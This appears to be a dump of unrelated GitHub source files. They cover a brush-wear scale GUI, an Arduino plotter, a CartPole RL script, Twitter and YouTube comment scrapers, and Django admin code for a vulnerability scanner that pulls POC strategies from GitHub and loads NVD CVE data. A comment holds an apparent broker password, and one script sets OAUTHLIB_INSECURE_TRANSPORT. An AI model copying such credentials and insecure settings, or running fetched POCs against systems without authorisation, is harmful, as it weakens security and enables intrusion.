while max_weight != min_weight:
average_weight.pop(0)
current_weight = Weight_read()
average_weight.append(current_weight)
max_weight = max(average_weight)
min_weight = min(average_weight)
loop_count += 1
if loop_count > 25:
print("check scale! can't get a stable reading")
return(current_weight)
def find_num_fibers(fiber_diameter):
# TODO
num_fibers = fiber_diameter * 500
return(num_fibers)
# Label objects
Blue_lbl = ttk.Label(window, text="Blue Brushes",
background="blue", font=("Helvetica", 16), width=30)
Blue_lbl.grid(column=0, row=4, rowspan=2, columnspan=5)
Red_lbl = ttk.Label(window, text="Red Brushes",
background="red", font=("Helvetica", 16), width=30)
Red_lbl.grid(column=6, row=4, rowspan=2, columnspan=5)
Green_lbl = ttk.Label(window, text="Green Brushes",
background="green", font=("Helvetica", 16), width=30)
Green_lbl.grid(column=12, row=4, rowspan=2, columnspan=5)
# Brush tuple Column 0=Item#, 1=Lenth, 2=Fiber Diameter
Brushes = (
['Not Measured', 0, 0],
['110733-01', 3.00, .010],
['110733-02', 3.00, .012],
['110733-03', 3.00, .015],
['110733-04', 3.19, .010],
['110733-05', 3.19, .012],
['110733-06', 3.19, .015],
['110733-07', 3.25, .010],
['110733-08', 3.25, .012],
['110733-09', 3.25, .015],
['110733-10', 3.34, .010],
['110733-11', 3.34, .012],
['110733-12', 3.34, .015],
['110733-13', 3.47, .010],
['110733-14', 3.47, .012],
['110733-15', 3.47, .015],
['110733-16', 3.53, .012],
['110733-17', 3.28, .012],
['110733-18', 3.65, .015],
['110733-19', 2.32, .008],
['110733-20', 2.32, .010],
['110733-21', 2.32, .012],
['110733-22', 2.50, .010],
['110733-23', 2.50, .012],
['110733-24', 2.50, .015],
['110733-25', 3.88, .012],
['110733-26', 3.65, .010],
['110733-27', 3.65, .012],
['110733-28', 3.65, .019],
['110733-29', 4.28, .010])
# Blue Combobox creation
Blue_combo = ttk.Combobox(window)
Blue_combo['values'] = Brushes
Blue_combo.current(1) # set the selected item
Blue_combo.grid(column=2, row=15)
# Red Combobox creation
Red_combo = ttk.Combobox(window)
Red_combo['values'] = Brushes
Red_combo.current(2) # set the selected item
Red_combo.grid(column=7, row=15)
# Green Combobox creation
Green_combo = ttk.Combobox(window)
Green_combo['values'] = Brushes
Green_combo.current(3) # set the selected item
Green_combo.grid(column=13, row=15)
# Selected Blue Brush
def Blue_clicked():
Blue_Brush = Blue_combo.get()
print(Blue_Brush)
print(Blue_start.get())
BlueButton = tk.Button(window, text='Record', command=Blue_clicked)
BlueButton.grid(column=2, row=50)
# Selected Red Brush
def Red_clicked():
Red_Brush = Red_combo.get() # sting
print(Red_Brush)
RedButton = tk.Button(window, text='Record', command=Red_clicked)
RedButton.grid(column=7, row=50)
# #############################################################################
# GREEN BUTTON
# #############################################################################
# Selected Green Brush
global green_brush
def Green_clicked():
"""
This function will be repeated for the other two buttons.
Collect information: Scale weight, Brush info, previous weight, and do the
calculations. Format this data for the tkinter GUI, and the output file
"""
global green_first_time
global green_brush
# Change button to be sunken, the command can not be run again
GreenButton.config(text='Recorded', relief='sunken', command='')
# Get the current weight from the scale
current_weight = sample_weight()
# Find out if this is the first record
if green_first_time:
green_first_time = False
# read the selected brush then make it grayed out
brush_info = Green_combo.get()
Green_combo.config(relief='sunken') # disabled=True
# TODO regex to parse the brush info into green_brush
green_brush[0] = brush_info[:8]
green_brush[2] = float(brush_info[-5:])/2
green_brush[4] = current_weight
# if green_first_time:
# green_first_time = False
# green_fiber_diamter = float(brush_info[-5:])
# find_num_fibers(green_fiber_diamter)
# G_start.set(current_weight)
# else:
# G_Current.set(G_Current.get())
# TODO add command if desired to change
# Green = sample_weight()
# G_Previous = Green
# G_Previous = find_num_fibers()
# print(G_Previous)
# print(Green)
GreenButton = tk.Button(window, text='Record', command=Green_clicked)
GreenButton.grid(column=13, row=50)
# Blue labels and Text Boxes
Blue_Start_lbl = ttk.Label(window,
text="Start Weight(g)",
font=("Helvetica", 12))
Blue_Start_lbl.grid(column=1, row=44,)
B_start = tk.StringVar()
Blue_start = ttk.Entry(window, width=15, textvariable=B_start)
Blue_start.grid(column=2, row=44)
Blue_Previous_lbl = ttk.Label(window,
text="Previous Weight(g)",
font=("Helvetica", 12))
Blue_Previous_lbl.grid(column=1, row=45,)
B_Previous = tk.StringVar()
Blue_Previous = ttk.Entry(window, width=15, textvariable=B_Previous)
Blue_Previous.grid(column=2, row=45)
Blue_Current_lbl = ttk.Label(window,
text="Current Weight(g)",
font=("Helvetica", 12))
Blue_Current_lbl.grid(column=1, row=46,)
B_Current = tk.StringVar()
Blue_Current = ttk.Entry(window, width=15, textvariable=B_Current)
Blue_Current.grid(column=2, row=46)
Blue_Diff_lbl = ttk.Label(window,
text="Difference Weight (g)",
font=("Helvetica", 12))
Blue_Diff_lbl.grid(column=1, row=47,)
B_diff = tk.StringVar()
Blue_diff = ttk.Entry(window, width=15, textvariable=B_diff)
Blue_diff.grid(column=2, row=47)
Blue_wear_lbl = ttk.Label(window,
text="Wear (mm)",
font=("Helvetica", 12))
Blue_wear_lbl.grid(column=1, row=48)
B_wear = tk.StringVar()
Blue_wear = ttk.Entry(window, width=15, textvariable=B_wear)
Blue_wear.grid(column=2, row=48)
Blue_total_wear_lbl = ttk.Label(window,
text="Total Wear (mm)",
font=("Helvetica", 12))
Blue_total_wear_lbl.grid(column=1, row=49,)
B_total_wear = tk.StringVar()
Blue_total_wear = ttk.Entry(window, width=15, textvariable=B_total_wear)
Blue_total_wear.grid(column=2, row=49)
# Red labels and Text Boxes
Red_Start_lbl = ttk.Label(window,
text="Start Weight(g)",
font=("Helvetica", 12))
Red_Start_lbl.grid(column=6, row=44,)
R_start = tk.StringVar()
Red_start = ttk.Entry(window, width=15, textvariable=R_start)
Red_start.grid(column=7, row=44)
Red_Previous_lbl = ttk.Label(window,
text="Previous Weight(g)",
font=("Helvetica", 12))
Red_Previous_lbl.grid(column=6, row=45,)
R_Previous = tk.StringVar()
Red_Previous = ttk.Entry(window, width=15, textvariable=R_Previous)
Red_Previous.grid(column=7, row=45)
Red_Current_lbl = ttk.Label(window,
text="Current Weight(g)",
font=("Helvetica", 12))
Red_Current_lbl.grid(column=6, row=46,)
R_Current = tk.StringVar()
Red_Current = ttk.Entry(window, width=15, textvariable=R_Current)
Red_Current.grid(column=7, row=46)
Red_Diff_lbl = ttk.Label(window,
text="Difference Weight (g)",
font=("Helvetica", 12))
Red_Diff_lbl.grid(column=6, row=47,)
R_diff = tk.StringVar()
Red_diff = ttk.Entry(window, width=15, textvariable=R_diff)
Red_diff.grid(column=7, row=47)
Red_wear_lbl = ttk.Label(window,
text="Wear (mm)",
font=("Helvetica", 12))
Red_wear_lbl.grid(column=6, row=48)
R_wear = tk.StringVar()
Red_wear = ttk.Entry(window, width=15, textvariable=R_wear)
Red_wear.grid(column=7, row=48)
Red_total_wear_lbl = ttk.Label(window,
text="Total Wear (mm)",
font=("Helvetica", 12))
Red_total_wear_lbl.grid(column=6, row=49,)
R_total_wear = tk.StringVar()
Red_total_wear = ttk.Entry(window, width=15, textvariable=R_total_wear)
Red_total_wear.grid(column=7, row=49)
# Green labels and Text Boxes
Green_Start_lbl = ttk.Label(window,
text="Start Weight(g)",
font=("Helvetica", 12))
Green_Start_lbl.grid(column=12, row=44,)
G_start = tk.StringVar()
Green_start = ttk.Entry(window, width=15, textvariable=G_start)
Green_start.grid(column=13, row=44)
Green_Previous_lbl = ttk.Label(window,
text="Previous Weight(g)",
font=("Helvetica", 12))
Green_Previous_lbl.grid(column=12, row=45,)
G_Previous = tk.StringVar()
Green_Previous = ttk.Entry(window, width=15, textvariable=G_Previous)
Green_Previous.grid(column=13, row=45)
Green_Current_lbl = ttk.Label(window,
text="Current Weight(g)",
font=("Helvetica", 12))
Green_Current_lbl.grid(column=12, row=46,)
G_Current = tk.StringVar()
Green_Current = ttk.Entry(window, width=15, textvariable=G_Current)
Green_Current.grid(column=13, row=46)
Green_Diff_lbl = ttk.Label(window,
text="Difference Weight (g)",
font=("Helvetica", 12))
Green_Diff_lbl.grid(column=12, row=47,)
G_diff = tk.StringVar()
Green_diff = ttk.Entry(window, width=15, textvariable=G_diff)
Green_diff.grid(column=13, row=47)
Green_wear_lbl = ttk.Label(window,
text="Wear (mm)",
font=("Helvetica", 12))
Green_wear_lbl.grid(column=12, row=48)
G_wear = tk.StringVar()
Green_wear = ttk.Entry(window, width=15, textvariable=G_wear)
Green_wear.grid(column=13, row=48)
Green_total_wear_lbl = ttk.Label(window,
text="Total Wear (mm)",
font=("Helvetica", 12))
Green_total_wear_lbl.grid(column=12, row=49,)
G_total_wear = tk.StringVar()
Green_total_wear = ttk.Entry(window, width=15, textvariable=G_total_wear)
Green_total_wear.grid(column=13, row=49)
window.mainloop()
```
#### File: 5voltsgc/brush_wear/fiber_count.py
```python
def find_fiber_count(scale, fiber_radius=0.127, fiber_height=76.2,
collar=2.213479):
""" Find Fiber Count, this function returns the estimated count of fibers.
This is calculated by following these steps:
Step 1. find weight of all fibers by subtracting the collar weight from
Scale weight or 2.213479 grams.
Step 2. Calculate weight of one fiber = pi() * radius^2 * height * Desity
Step 3. Divide fibers weight from step one by weight of one fiber step 2.
Step 4. Return the value from step 3. as an integer rounded up.
The desnisty of AISI C1018 & C1065 is 0.00787(g/mm³) gram/mm³
The collar is precalculated to be 2.213479 grams
"""
# Step 1 - Find weight of all fibers
fibers_weight = scale - collar
# Step 2 - weight of one fiber
fiber_weight = 3.141592 * fiber_radius**2 * fiber_height * 0.00787
# Step 3 - Divide weight of all fibers by weight of one fiber to find count
count = int(round(fibers_weight / fiber_weight, 0))
return(count)
weight_from_scale = 31.785
rad = 0.127
lenth = 76.2
print(find_fiber_count(weight_from_scale, rad, lenth))
``` |
{
"source": "5voltsgc/EOLT_R6",
"score": 3
} |
#### File: 5voltsgc/EOLT_R6/realTimePlotting.py
```python
import sys
import time
import serial
import matplotlib.pyplot as plt
def getdata():
arduino.write(str.encode("getdata?\n"))
resposta=arduino.readline()
decoded_bytes = str(resposta[0:len(resposta)-2].decode("utf-8"))
resposta=decoded_bytes
#print (resposta)
return resposta
plt.ion()
plt.xlabel('Time (sec)')
plt.ylabel('Temperature (deg C)')
arduino = serial.Serial('/dev/ttyUSB0',9600,timeout=2)
tempo_total=100
intervalo_tempo=3
relogio_start = time.time()
relogio_final = relogio_start + tempo_total
now=time.time()
i=0
while (now < relogio_final):
if (now > relogio_start+(intervalo_tempo*i)):
data_collected=getdata()
tempo_now = (time.time()-relogio_start)
data_to_save=str(tempo_now) + "," + data_collected
#print (data_to_save)
data=data_to_save.split(',')
plt.plot(float(data[0]),float(data[1]), 'og')
plt.show
plt.pause(0.0001)
i = i + 1
now=time.time()
``` |
{
"source": "5Volts/Reinforcement-Learning-For-Cartpole",
"score": 4
} |
#### File: 5Volts/Reinforcement-Learning-For-Cartpole/RL_for_cartpole.py
```python
import argparse
import random
import gym
import tensorflow as tf
import numpy as np
class RL:
def __init__(self,observation_size=4,action_size=2):
'''
Initializing Variables for this class
:param observation_size: The size of the observation space
Default : 4 (for cartpole)
[Ex: 6]
:param action_size: The size of the action space
Default : 2 (for cartpole)
[Ex: 3]
'''
self.action_size= action_size
self.observation = tf.placeholder(tf.float32,[None,observation_size])
self.labeled_moves = tf.placeholder(tf.float32,[None,action_size])
def network(self,hidden_size=100):
'''
The deep neural network model where we will be using.
:param hidden_size: Number of nodes in the hidden layers.
Default : 100
[Ex: 64]
:return:Tensor Output of the network
'''
fc1 = tf.layers.dense(self.observation,hidden_size,activation=tf.nn.relu)
fc2 = tf.layers.dense(fc1, hidden_size, activation=tf.nn.relu)
d1 = tf.nn.dropout(fc2,0.8)
fc3 = tf.layers.dense(d1, hidden_size, activation=tf.nn.relu)
fc4 = tf.layers.dense(fc3, self.action_size, activation=None)
return fc4
def np_softmax(x):
'''
External softmax function for the network as I wasn't able to integrate
it directly into the model.
:param x: List of Numbers
[1,2,3]
:return: List of numbers after softmax
[0.09003057, 0.24472847, 0.66524096]
'''
return np.exp(x) / np.sum(np.exp(x),axis=0)
def main(args):
dict_args = vars(args)
# Let's define all of our variables
test_episodes = dict_args['test_episodes'] # Number of testing episodes
train_step = dict_args['train_step'] # Number of train episode
explore_proba_decay = dict_args['explore_proba'] # Explore decay rate, how fast we want the agent to switch
# from random to using the network. (explore_proba_decay ** steps)
# Bear in mind that using
# a small value may cause the model to never converge.
select_top_best = dict_args['select_top_best'] # Select the top k examples where the model did the best
sample = dict_args['sample'] # How much we want to sample in each train steps
epoch = 15 # Training the neural network on the data collected
curr_longest = 0 # sum of reward from best top k examples
# Initialize the OpenAI gym
env = gym.make('CartPole-v0')
act_space = env.action_space.n
ob_space = env.observation_space.shape[0]
observation = env.reset()
# Declare the deep neural network
net = RL(observation_size=ob_space, action_size=act_space)
output = net.network()
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=output,
labels=net.labeled_moves))
optimizer = tf.train.AdamOptimizer(learning_rate=0.01).minimize(loss)
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for step in range(train_step):
data = []
labels = []
print('Step:', step)
# Play (N = sample) times and select the top k examples
for _ in range(sample):
done = False
total_reward = 0
one_datapoint = []
one_action = []
while done == False:
# Select between explore and use network by chance
val = random.uniform(0, 1)
if val < explore_proba_decay ** step:
act = env.action_space.sample()
elif val > explore_proba_decay ** step:
obs_reshaped = np.reshape(observation, (-1, ob_space))
final_layer = sess.run(output, feed_dict={net.observation: obs_reshaped})[0]
layer_score = np_softmax(final_layer)
act = np.argmax(layer_score)
# Ensure that the state BEFORE committing the action is saved
# rather than after
one_datapoint.append(observation)
observation, reward, done, info = env.step(act)
act_one_hot = np.zeros([act_space])
act_one_hot[act] = 1
one_action.append(act_one_hot)
total_reward += reward
if dict_args['watch_it_train'] == True:
env.render()
observation = env.reset()
data.append(one_datapoint)
labels.append(one_action)
data.sort(key=len)
labels.sort(key=len)
li_of_len = [len(x) for x in data[-select_top_best:]]
# If the top k selected isn't any better than the previous
# ones. We will omit it.
if sum(li_of_len) < curr_longest:
print("Long not found, Continue")
print("Top", select_top_best, "Examples", li_of_len)
continue
# Else if we found better performing data,
# we'll train it on the deep neural network
else:
print("Top", select_top_best, "Examples", li_of_len)
print(li_of_len)
curr_longest = sum(li_of_len)
training_data = []
training_label = []
for datas in data[-select_top_best:]:
training_data.extend(datas)
for label in labels[-select_top_best:]:
training_label.extend(label)
for _ in range(epoch):
a, c = sess.run([optimizer, loss], feed_dict={net.observation: training_data,
net.labeled_moves: training_label})
# Once we've completed our training, we can watch how it performs.
for i in range(test_episodes):
state = env.reset()
done = False
while done == False:
obs_reshaped = np.reshape(state, (-1, ob_space))
final_layer = sess.run(output, feed_dict={net.observation: obs_reshaped})[0]
layer_score = np_softmax(final_layer)
act = np.argmax(layer_score)
state, reward, done, info = env.step(act)
env.render()
saver.save(sess, 'model/RL')
if __name__ == '__main__':
parser = argparse.ArgumentParser('RL For Cartpole Game')
parser.add_argument('--watch_it_train',
type=bool,
default=False)
parser.add_argument('--explore_proba',
type=int,
default=0.98)
parser.add_argument('--train_step',
type=int,
default=100)
parser.add_argument('--test_episodes',
type=int,
default=20)
parser.add_argument('--select_top_best',
type=int,
default=3)
parser.add_argument('--sample',
type=int,
default=15)
args = parser.parse_args()
main(args)
``` |
{
"source": "5war00p/NLP-Code-Mixing",
"score": 3
} |
#### File: NLP-Code-Mixing/Twitter Extraction/scrap.py
```python
import os
import json
import requests
from dotenv import load_dotenv
load_dotenv()
# To set your enviornment variables in your terminal run the following line:
# export 'BEARER_TOKEN'='<your_bearer_token>'
bearer_token = os.getenv('TWITTER_API_KEY')
def getComments(tweets):
MAX_SEARCH_TWT_LIMIT = 700 #270
text = []
next_token = ''
count = 0
for index, tweet in enumerate(tweets):
if count == MAX_SEARCH_TWT_LIMIT:
break
while True:
if count == MAX_SEARCH_TWT_LIMIT:
break
if next_token != '':
url = f'https://api.twitter.com/2/tweets/search/recent?query=conversation_id:{tweet}&max_results=100&next_token={next_token}'
else:
url = f'https://api.twitter.com/2/tweets/search/recent?query=conversation_id:{tweet}&max_results=100'
try:
response = connect_to_endpoint(url)
except:
return text
print('tweet-{}_{}_{}'.format(index+1, tweet, next_token))
if 'data' in response:
for twt in response['data']:
text.append(twt['text'])
if 'meta' in response and 'next_token' in response['meta']:
next_token = response['meta']['next_token']
else:
next_token=''
break
count += 1
return text
def getTweetComments(data):
MAX_TWT_LOOKUP = 900
tweetIDs = {}
next_token = ''
window_count = 0
for user in data:
id = user["id"]
tweetIDs[id] = []
if window_count == MAX_TWT_LOOKUP:
break
while True:
if window_count == MAX_TWT_LOOKUP:
break
if next_token != '':
url = f'https://api.twitter.com/2/users/{id}/tweets?&max_results=100&pagination_token={next_token}'
else:
url = f'https://api.twitter.com/2/users/{id}/tweets?&max_results=100'
response = connect_to_endpoint(url)
window_count += 1
if 'data' in response:
tweetIDs[id].extend([twt['id'] for twt in response['data']])
if 'meta' in response and 'next_token' in response['meta']:
next_token = response['meta']['next_token']
else:
break
text = getComments(tweetIDs[id])
with open(user['username'] + '.txt', 'w', encoding='utf-8') as outfile:
for line in text:
outfile.write("%s\n" % line)
def getUserIDs(usernames):
usernames = f"usernames={usernames}"
url = "https://api.twitter.com/2/users/by?{}".format(usernames)
response = connect_to_endpoint(url)
return response['data']
def bearer_oauth(r):
"""
Method required by bearer token authentication.
"""
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2UserLookupPython"
return r
def connect_to_endpoint(url):
response = requests.request("GET", url, auth=bearer_oauth,)
if response.status_code != 200:
raise Exception(
"Request returned an error: {} {}".format(
response.status_code, response.text
)
)
return response.json()
def main():
usernames = input('Enter username: ')
users = getUserIDs(usernames)
getTweetComments(users)
if __name__ == "__main__":
main()
```
#### File: NLP-Code-Mixing/Youtube Extraction/scrap.py
```python
import os
from dotenv import load_dotenv
import googleapiclient.discovery
load_dotenv()
os.environ["OAUTHLIB_INSECURE_TRANSPORT"] = "1"
api_service_name = "youtube"
api_version = "v3"
DEVELOPER_KEY = os.getenv('YOUTUBE_API_KEY')
YOUTUBE = googleapiclient.discovery.build(
api_service_name, api_version, developerKey = DEVELOPER_KEY)
MAX_COMMENT_RESULTS = 100
MAX_VIDEOS_RESULTS = 50
def reqPlaylistVideos(playlistId):
request = YOUTUBE.playlistItems().list(
part="contentDetails",
maxResults=MAX_VIDEOS_RESULTS,
playlistId=playlistId
)
response = request.execute()
videos = []
for item in response['items']:
videoId = item['contentDetails']['videoId']
videos.append(videoId)
return videos
def reqCommentThreads(videoId, pageToken=None):
request = YOUTUBE.commentThreads().list(
part="snippet,replies",
maxResults=MAX_COMMENT_RESULTS,
textFormat="plainText",
videoId=videoId,
pageToken = pageToken,
)
response = request.execute()
return response
def filterJSON(response):
items = response['items']
comments_data = []
for item in items:
try:
comment = item['snippet']['topLevelComment']['snippet']['textDisplay']
comment = comment.replace('\n', ' ')
comments_data.append(comment)
if 'replies' in item:
comment_replies= item['replies']['comments']
for reply in comment_replies:
comment_reply = reply['snippet']['textDisplay']
comment_reply = comment_reply.replace('\n', ' ')
comments_data.append(comment_reply)
except KeyError:
print('textDisplay Key not Found!!')
return comments_data
def byPlaylists(filename):
fd = open(filename + '.txt', 'r', encoding='utf-8')
playlistIDs = fd.readlines()
for index, playlistID in enumerate(playlistIDs):
finalData = []
playlistID = playlistID.replace('\n', '')
try:
videoIds = reqPlaylistVideos(playlistID)
for vID in videoIds:
try:
response = reqCommentThreads(vID)
data = filterJSON(response)
finalData.extend(data)
try:
totalPages = response['pageInfo']['totalResults']
for _ in range(totalPages):
if 'nextPageToken' not in response:
break
nextPageToken = response['nextPageToken']
try:
response = reqCommentThreads(Id, nextPageToken)
data = filterJSON(response)
finalData.extend(data)
except:
pass
except KeyError:
print('totalResults Key not Found!!')
except:
pass
print(f'playlist-{index+1}_{playlistID}')
except:
print(f'playlist-{index+1}_{playlistID}_skipped')
export(playlistID, finalData)
def export(fname, finalData):
with open(fname + '.txt', 'w', encoding='utf-8') as outfile:
for line in finalData:
outfile.write("%s\n" % line)
def main():
choice = int(input('''Wanna give videoID(0) or playlistID(1) or multiple-Playlists(2)?\nChoose either (0 or 1 or 2): '''))
Id = None
finalData = []
if choice == 1:
Id = input('Enter playListID: ')
videoIds = reqPlaylistVideos(Id)
for vID in videoIds:
try:
response = reqCommentThreads(vID)
data = filterJSON(response)
finalData.extend(data)
try:
totalPages = response['pageInfo']['totalResults']
for _ in range(totalPages):
if 'nextPageToken' not in response:
break
nextPageToken = response['nextPageToken']
try:
response = reqCommentThreads(Id, nextPageToken)
data = filterJSON(response)
finalData.extend(data)
except:
pass
except KeyError:
print('totalResults Key not Found!!')
print(f'playlist-{Id}_{vID}')
except:
pass
export(Id, finalData)
elif choice == 0:
Id = input('Enter videoID: ')
response = reqCommentThreads(Id)
data = filterJSON(response)
finalData.extend(data)
try:
totalPages = response['pageInfo']['totalResults']
for _ in range(totalPages):
if 'nextPageToken' not in response:
break
nextPageToken = response['nextPageToken']
try:
response = reqCommentThreads(Id, nextPageToken)
data = filterJSON(response)
finalData.extend(data)
except:
pass
except KeyError:
print('totalResults Key not Found!!')
export(Id, finalData)
elif choice == 2:
fname = input('Enter filename that contains all playlist IDs: ')
finalData.extend(byPlaylists(fname))
if __name__ == "__main__":
main()
``` |
{
"source": "5wimming/ase",
"score": 2
} |
#### File: ase/ASE/celery.py
```python
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery, platforms
from django.conf import settings
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ASE.settings')
app = Celery('ASE', backend='redis://127.0.0.1:6379/0', broker='redis://127.0.0.1:6379/0') # amqp://asemq:Ase.mq.005 @127.0.0.1:5672/ase
# 指定从django的settings.py里读取celery配置
app.config_from_object('django.conf:settings')
# 自动从所有已注册的django app中加载任务
app.autodiscover_tasks()
# 用于测试的异步任务
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request))
```
#### File: ase/StrategyModel/admin.py
```python
from django.http import StreamingHttpResponse, JsonResponse
from django.contrib import admin
from import_export import resources
from StrategyModel.models import VulnStrategy, NvdCve
from import_export.admin import ImportExportModelAdmin, ImportExportActionModelAdmin
from simpleui.admin import AjaxAdmin
from django_redis import get_redis_connection
from ASE import settings
import logging
from . import tasks
logger = logging.getLogger("mdjango")
conn_redis = get_redis_connection('default')
class VulnStrategyResource(resources.ModelResource):
class Meta:
model = VulnStrategy
class VulnStrategyAdmin(ImportExportActionModelAdmin, ImportExportModelAdmin, AjaxAdmin):
list_display = ('strategy_name', 'port', 'service_name', 'application', 'version', 'create_time') # list
search_fields = ('strategy_name', 'port', 'service_name', 'application')
list_filter = ('service_name', 'application', 'create_time')
resource_class = VulnStrategyResource
list_per_page = 20
actions = ['layer_update_poc']
def layer_update_poc(self, request, queryset):
git_url = request.POST['name']
if not git_url.startswith('https://api.github.com/repos'):
return JsonResponse(data={
'status': 'error',
'msg': 'url is illegal'
})
if conn_redis.get('poc_update') == b'True':
return JsonResponse(data={
'status': 'success',
'msg': 'Please wait a moment, updating...'
})
try:
conn_redis.set('poc_update', 'True')
conn_redis.expire('poc_update', 18000)
tasks.task_update_poc.delay(git_url)
except Exception as e:
logger.error('code 07100001 - {}'.format(e))
conn_redis.set('poc_update', 'False')
return JsonResponse(data={
'status': 'success',
'msg': 'updating now'
})
layer_update_poc.short_description = 'update poc'
layer_update_poc.type = 'success'
layer_update_poc.icon = 'el-icon-s-promotion'
layer_update_poc.layer = {
'title': 'confirm',
'tips': 'you can input the storage url of POC',
'confirm_button': 'submit',
'cancel_button': 'cancel',
'width': '40%',
'labelWidth': "80px",
'params': [{
'type': 'input',
'key': 'name',
'label': 'url',
'value': 'https://api.github.com/repos/5wimming/ASE/contents/StrategyTools',
'require': False
}]
}
class NvdCveAdmin(ImportExportActionModelAdmin, ImportExportModelAdmin, AjaxAdmin):
list_display = (
'application', 'vendor', 'cve_data_meta', 'base_score', 'version_start_including', 'version_end_including',
'mid_version') # list
search_fields = ('application', 'cve_data_meta', 'cpe23uri', 'version_start_including', 'version_end_including',
'mid_version')
list_filter = ('base_score',)
list_per_page = 20
def has_add_permission(self, request):
return False
def has_export_permission(self, request):
return False
actions = ['layer_update_cve', 'delete_all_cve']
def layer_update_cve(self, request, queryset):
nvd_url = request.POST['name']
if not nvd_url.startswith('https://nvd.nist.gov/feeds/json/'):
return JsonResponse(data={
'status': 'error',
'msg': 'nvd url is illegal'
})
if conn_redis.get('nvd_update') == b'True':
return JsonResponse(data={
'status': 'success',
'msg': 'Please wait a moment, updating...'
})
conn_redis.set('nvd_update', 'True')
conn_redis.expire('nvd_update', 18000)
try:
tasks.task_update_cve_info.delay(nvd_url)
except Exception as e:
logger.error('code 0725006 - {}'.format(e))
conn_redis.set('nvd_update', 'False')
return JsonResponse(data={
'status': 'success',
'msg': ' nvd updating now'
})
layer_update_cve.short_description = 'update poc'
layer_update_cve.type = 'success'
layer_update_cve.icon = 'el-icon-s-promotion'
layer_update_cve.layer = {
'title': 'confirm',
'tips': 'you can input the storage url of nvd',
'confirm_button': 'submit',
'cancel_button': 'cancel',
'width': '40%',
'labelWidth': "80px",
'params': [{
'type': 'input',
'key': 'name',
'label': 'url',
'value': 'https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2021.json.zip',
'require': False
}]
}
def delete_all_cve(self, request, queryset):
input_name = request.POST['name']
if input_name != 'delete all':
return JsonResponse(data={
'status': 'error',
'msg': ' input illegal'
})
if conn_redis.get('delete_all') != b'True':
tasks.task_delete_cve.delay()
return JsonResponse(data={
'status': 'success',
'msg': ' deleting now'
})
delete_all_cve.short_description = 'delete all'
delete_all_cve.type = 'update'
delete_all_cve.icon = 'el-icon-delete-solid'
delete_all_cve.layer = {
'title': 'confirm',
'tips': 'please input "delete all"',
'confirm_button': 'submit',
'cancel_button': 'cancel',
'width': '40%',
'labelWidth': "80px",
'params': [{
'type': 'input',
'key': 'name',
'label': 'input',
'require': True
}]
}
admin.site.register(VulnStrategy, VulnStrategyAdmin)
admin.site.register(NvdCve, NvdCveAdmin)
```
#### File: ase/StrategyModel/update_cve.py
```python
import zipfile
import json
import os
import csv
import requests
from ASE import settings
from StrategyModel.models import NvdCve
import logging
# cve_results = []
logger = logging.getLogger("mdjango")
def get_file_info(filepath, sql_dict):
if not filepath.endswith('/'):
filepath += '/'
result = []
for filename in os.listdir(filepath):
if filename.endswith('.zip'):
try:
zip_file = zipfile.ZipFile(filepath + filename)
for names in zip_file.namelist():
zip_file.extract(names, filepath)
zip_file.close()
except Exception as e:
logger.error('code 0701002 - {}'.format(e))
for filename in os.listdir(filepath):
if filename.endswith('.json'):
try:
with open(filepath + filename, 'r', encoding='utf-8') as fr:
cve_json = json.load(fr)
if cve_json:
get_cve_info(cve_json, sql_dict)
except Exception as e:
logger.error('code 0701003 - {}'.format(e))
logger.info('find {} cve json'.format(len(result)))
return result
def get_child(node, cve_data_meta, description_value, base_score, published_date, last_modified_date, sql_dict, cve_results):
cpe_match = node.get('cpe_match', [])
for cpe_dict in cpe_match:
cpe23uri = cpe_dict.get('cpe23Uri', '')
if not cpe23uri:
continue
cpe_info = cpe23uri.split(':')
vendor = cpe_info[3]
application = cpe_info[4]
mid_version = cpe_info[5]
version_start_including = cpe_dict.get('versionStartIncluding', '')
version_end_including = cpe_dict.get('versionEndIncluding', '')
dup_str = cve_data_meta + version_start_including + version_end_including + mid_version
if dup_str in sql_dict:
continue
sql_dict[dup_str] = 1
temp = [vendor, application, cve_data_meta, cpe23uri, str(version_start_including), str(version_end_including),
str(mid_version), str(base_score), description_value, published_date, last_modified_date]
cve_results.append(temp)
children = node.get('children', [])
for child in children:
try:
get_child(child, cve_data_meta, description_value, base_score, published_date, last_modified_date, sql_dict, cve_results)
except Exception as e:
logger.error('code 0704018 - {}'.format(e))
def get_cve_info(cve_data, sql_dict):
logger.info('get cve info')
cve_results = []
for cve_item in cve_data['CVE_Items']:
try:
cve_info = cve_item['cve']
cve_data_meta = cve_info['CVE_data_meta'].get('ID')
description_value = cve_info.get('description', {}).get('description_data', [{}])[0].get('value', '')
impact = cve_item.get('impact', {})
cvss = impact.get('baseMetricV3', impact.get('baseMetricV2', {}))
base_score = cvss.get('cvssV3', cvss.get('cvssV2', {})).get('baseScore', -1)
published_date = cve_item.get('publishedDate', '')
last_modified_date = cve_item.get('lastModifiedDate', '')
nodes = cve_item['configurations']['nodes']
if int(base_score) < settings.CVE_BASE_SCORE:
continue
for node in nodes:
get_child(node, cve_data_meta, description_value, base_score, published_date, last_modified_date,
sql_dict, cve_results)
except Exception as e:
logger.error('[error] : {} - {}'.format(e, cve_item))
if cve_results:
logger.info('insert cve into mysql')
for cve_result in cve_results:
try:
save_result = NvdCve(vendor=cve_result[0], application=cve_result[1], cve_data_meta=cve_result[2],
cpe23uri=cve_result[3], version_start_including=cve_result[4],
version_end_including=cve_result[5], mid_version=cve_result[6],
base_score=cve_result[7], description_value=cve_result[8],
published_date=cve_result[9], last_modified_date=cve_result[10])
save_result.save()
except Exception as e:
logger.error('code 0702008 - {}'.format(e))
logger.info('get {} cpe'.format(len(cve_results)))
def output_data():
data_title = ['vendor', 'application', 'cve_data_meta', 'cpe23uri', 'version_start_including',
'version_end_including', 'mid_version', 'base_score', 'description_value', 'published_date',
'last_modified_date']
with open('./result.csv', 'w', encoding='utf-8', newline='') as fw:
csv_w = csv.writer(fw)
csv_w.writerow(data_title)
# csv_w.writerow(cve_results)
def get_new_nvd(url, file_path):
request_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Ase/20160606 Firefox/60.0',
